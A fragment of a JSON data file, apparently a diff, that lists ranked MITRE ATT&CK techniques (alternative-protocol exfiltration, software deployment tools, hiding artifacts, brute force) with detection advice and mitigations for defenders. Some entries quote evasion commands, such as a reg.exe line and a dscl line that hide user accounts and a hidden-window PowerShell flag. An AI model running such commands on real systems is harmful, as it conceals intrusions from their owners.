"https://attack.mitre.org/techniques/T1048", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "score": 1.2468289257580951, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "subtechniques": [ + { + "tid": "T1048.001", + "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ", + "url": "https://attack.mitre.org/techniques/T1048/001", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ", + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1048.002", + "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ", + "url": "https://attack.mitre.org/techniques/T1048/002", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ", + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ] + }, + { + "tid": "T1048.003", + "name": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "url": "https://attack.mitre.org/techniques/T1048/003", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ", + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ] + } + ] + }, + { + "rank": 39, + "tid": "T1072", + "name": "Software Deployment Tools", + "description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.", + "url": "https://attack.mitre.org/techniques/T1072", + "detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.", + "score": 1.2430957116790475, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 40, + "tid": "T1564", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)", + "url": "https://attack.mitre.org/techniques/T1564", + "detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.", + "score": 1.2414746828571428, + "network_score": 0.2, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1564.001", + "name": "Hide Artifacts: Hidden Files and Directories", + "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", + "url": "https://attack.mitre.org/techniques/T1564/001", + "detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", + "mitigations": [] + }, + { + "tid": "T1564.002", + "name": "Hide Artifacts: Hidden Users", + "description": "Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.\nIn macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the Create Account technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\nIn Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via Reg or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)", + "url": "https://attack.mitre.org/techniques/T1564/002", + "detection": "This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \"hidden\" users may still get a home directory and will appear in the authentication logs.\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList key.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1564.003", + "name": "Hide Artifacts: Hidden Window", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \nOn Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)", + "url": "https://attack.mitre.org/techniques/T1564/003", + "detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1564.004", + "name": "Hide Artifacts: NTFS File Attributes", + "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", + "url": "https://attack.mitre.org/techniques/T1564/004", + "detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1564.005", + "name": "Hide Artifacts: Hidden File System", + "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)", + "url": "https://attack.mitre.org/techniques/T1564/005", + "detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting Bootkit activity.", + "mitigations": [] + }, + { + "tid": "T1564.006", + "name": "Hide Artifacts: Run Virtual Instance", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)", + "url": "https://attack.mitre.org/techniques/T1564/006", + "detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\nMonitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for Windows Service, with respect to virtualization software. \nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1564.007", + "name": "Hide Artifacts: VBA Stomping", + "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)", + "url": "https://attack.mitre.org/techniques/T1564/007", + "detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1564.008", + "name": "Hide Artifacts: Email Hiding Rules", + "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule PowerShell cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to Internal Spearphishing emails sent from the compromised account.\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)", + "url": "https://attack.mitre.org/techniques/T1564/008", + "detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1564.009", + "name": "Hide Artifacts: Resource Forking", + "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)", + "url": "https://attack.mitre.org/techniques/T1564/009", + "detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ", + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + } + ] + } + ] + }, + { + "rank": 41, + "tid": "T1110", + "name": "Brute Force", + "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to Valid Accounts within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as OS Credential Dumping, Account Discovery, or Password Policy Discovery. Adversaries may also combine brute forcing activity with behaviors such as External Remote Services as part of Initial Access.", + "url": "https://attack.mitre.org/techniques/T1110", + "detection": "Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.", + "score": 1.2097880058714285, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + } + ], + "subtechniques": [ + { + "tid": "T1110.001", + "name": "Brute Force: Password Guessing", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n
    \n
  • SSH (22/TCP)
    • \n
  • Telnet (23/TCP)
    • \n
  • FTP (21/TCP)
    • \n
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
    • \n
  • LDAP (389/TCP)
    • \n
  • Kerberos (88/TCP)
    • \n
  • RDP / Terminal Services (3389/TCP)
    • \n
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
    • \n
  • MSSQL (1433/TCP)
    • \n
  • Oracle (1521/TCP)
    • \n
  • MySQL (3306/TCP)
    • \n
  • VNC (5900/TCP)
    • \n
